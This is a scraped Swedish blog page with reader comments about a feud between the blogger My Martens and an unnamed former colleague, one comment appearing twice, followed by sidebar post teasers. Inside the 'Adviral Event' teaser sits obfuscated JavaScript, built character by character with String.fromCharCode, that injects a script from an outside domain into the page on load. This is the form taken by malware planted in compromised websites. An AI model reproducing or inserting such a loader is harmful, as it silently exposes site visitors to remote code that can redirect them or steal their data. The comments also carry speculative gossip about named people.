  Man mÄste sÀtta punkt och gÄ vidare , fÄ ett avslut.
  TrÄkigt att dina samarbetspartner backar och tar parti ( OBS min tolkning) jag tÀnker att personen som stÄr pÄ andra sidan dvs ocksÄ har /har haft samarbete med samma företag mÄste kÀnna sig oerhört sÄrad och krÀnkt
  och dĂ€rför kanske det skulle vara bra att prata, komma till ett avslut….
  Jag förstĂ„r att du inte kan skriva ut allt pĂ„ bloggen, och jag tror med betoning pĂ„ tror att du vet nĂ„gonstans varför ” hen” Ă€r sĂ„ besviken pĂ„ dig och fortfarande har svĂ„rt att ”
  Vistas i samma rum”
  Det Àr inte bara du som Àr sviken och lÀmnad, motparten kÀnner nog ocksÄ sÄ
  Allt man kan göra Àr att rannsaka sig sjÀlv, stÄ för felaktiga beslut och ageranden , be om ursÀkt.
  Sen mÄste man gÄ vidare, sorg över förlorad vÀnskap kanske kommer göra ont hela livet, men viktigt att komma ihÄg att en gÄng var man sÄ glad över att den fanns.
  Att ” insinuera” och ” hinta” sĂ€ga A men inte B , gĂ„ng efter gĂ„ng pĂ„peka att du av hĂ€nsyn inte tar bladet frĂ„n munnen tror jag skadar dig mer Ă€n gynnar dig (möjligtvis ökar trafiken till bloggen och det Ă€r ju bra)
  Det blir onödiga spekulationer och kĂ€nns mer som om att du försöker skydda dig mot ev ”
  LĂ€ckage” frĂ„n annan blogg-kollega.
  Har du gjort allt du kunnat för att göra det bra, sagt förlÄt men inte fÄtt nÄgon respons ja dÄ tror jag att det Àr bÀst att gÄ vidare och ta med sig de fina minnena
  Trevlig kvÀll pÄ dig!

  • Word!! Exakt sĂ„. Att ”sĂ€ga A men inte B” gör att folk fortsĂ€tter att klicka in hĂ€r och eftersom det genererar pengar sĂ„ fortsĂ€tter de inlĂ€ggen att komma men det spĂ€r ju ocksĂ„ pĂ„ skitsnacket.

   Jag klickar in hĂ€r max en gĂ„ng i veckan nu för man orkar liksom inte mer, skummar de första raderna och Ă€r det Ă€nnu ett ”sĂ„nt” inlĂ€gg sĂ„ stĂ€nger jag ner sidan.

   Jag följer bloggar för att bli inspirerad och peppad, men hĂ€r Ă€r det bara ”hemligheter” och kryptiska inlĂ€gg numera. Trist!

   My, jag diggar dig men orkar inte lÀsa mer sÄnt hÀr nu. Sorry! Kram

 42. Jag har sett detta drev emot dig. Smutskastning pÄ en vÀldigt infantil nivÄ. Man skriver indirekt, men ÀndÄ för att utpekade vem som avses. Inga pÄfallande begÄvningar precis. Nuförtiden vet jag inte, för jag följer inte dessa personer sedan lÀnge. Helt ointressanta enligt mig, i motsats till dig. Det Àr hÀrligt att följa dig i framgÄng som motgÄng. Inga fÄnerier.
  HÀrligt att lÀsa om torpet, hÀstarna och kÀrleken.
  LÄt dem inte ta detta ifrÄn dig. Du Àr my martens, m skinn pÄ nÀsan, med ett guldhjÀrta.
  Minns nĂ€r en av dem skulle stajla inför mobbklubben genom att fĂ€lla en kommentar pĂ„ din blogg, som hon kĂ€nde sig uthĂ€ngd för att du publicerade den đŸ˜”. Hahahah. 😁. Ditt svar pĂ„ den. SĂ„ jĂ€vla cool.
  Stor Kramis pĂ„ dig och lĂ„t ingen skita dig p nĂ€san. LĂ„t dem krysta ifred i det blĂ„ skĂ„pet…

 43. Hej! Att fortsĂ€tta efter 2 Ă„r innebĂ€r att ”hen” Ă€r otroligt bitter och lĂ„ngsint. Och förmodligen vĂ€ldigt svartsjuk/svart i tanken. Jag tror att ”hen” Ă€r samma person som morrar som en katt pĂ„ alla instastories, skriver FÀÀÀÀÀÀshion pĂ„ alla pyjamasbilder och hashtaggar killerdog/mördarhund pĂ„ alla bilder pĂ„ sin nya hund. (Allt för att reta sina följare). Men det Ă€r vad jag tror. Är inte alls sĂ€kert att det Ă€r sĂ„, Men man förstod ju att hon förbjöd Magnus H att sammarbeta med My. Nu har hon ev förbjudit fler som jobbar med Better you (nĂ„t om hĂ„r kanske). SĂ„g att han la upp pĂ„ insta om sviken av vĂ€nner. Jag tycker det Ă€r dagisnivĂ„ att lĂ€gga sig i samarbeten. FortsĂ€tt kĂ€mpa My. Det god vinner alltid…<3

 44. Hej! Att fortsĂ€tta efter 2 Ă„r innebĂ€r att ”hen” Ă€r otroligt bitter och lĂ„ngsint. Och förmodligen vĂ€ldigt svartsjuk/svart i tanken. Jag tror att ”hen” Ă€r samma person som morrar som en katt pĂ„ alla instastories, skriver FÀÀÀÀÀÀshion pĂ„ alla pyjamasbilder och hashtaggar killerdog/mördarhund pĂ„ alla bilder pĂ„ sin nya hund. (Allt för att reta sina följare). Men det Ă€r vad jag tror. Är inte alls sĂ€kert att det Ă€r sĂ„, Men man förstod ju att hon förbjöd Magnus H att sammarbeta med My. Nu har hon ev förbjudit fler som jobbar med Better you (nĂ„t om hĂ„r kanske). SĂ„g att han la upp pĂ„ insta om sviken av vĂ€nner. Jag tycker det Ă€r dagisnivĂ„ att lĂ€gga sig i samarbeten. FortsĂ€tt kĂ€mpa My. Det god vinner alltid…<3

Svara

LĂ€mna din kommentar!
Ditt namn hÀr

Om du missat..

Andas ut stressen med hjÀlp av djupandning

Andas ut stressen med hjÀlp av djupandning -Hur mÄnga tÀnker egentligen pÄ sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej pĂ„ er! Detta Ă€r en grymt efterlĂ€ngtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/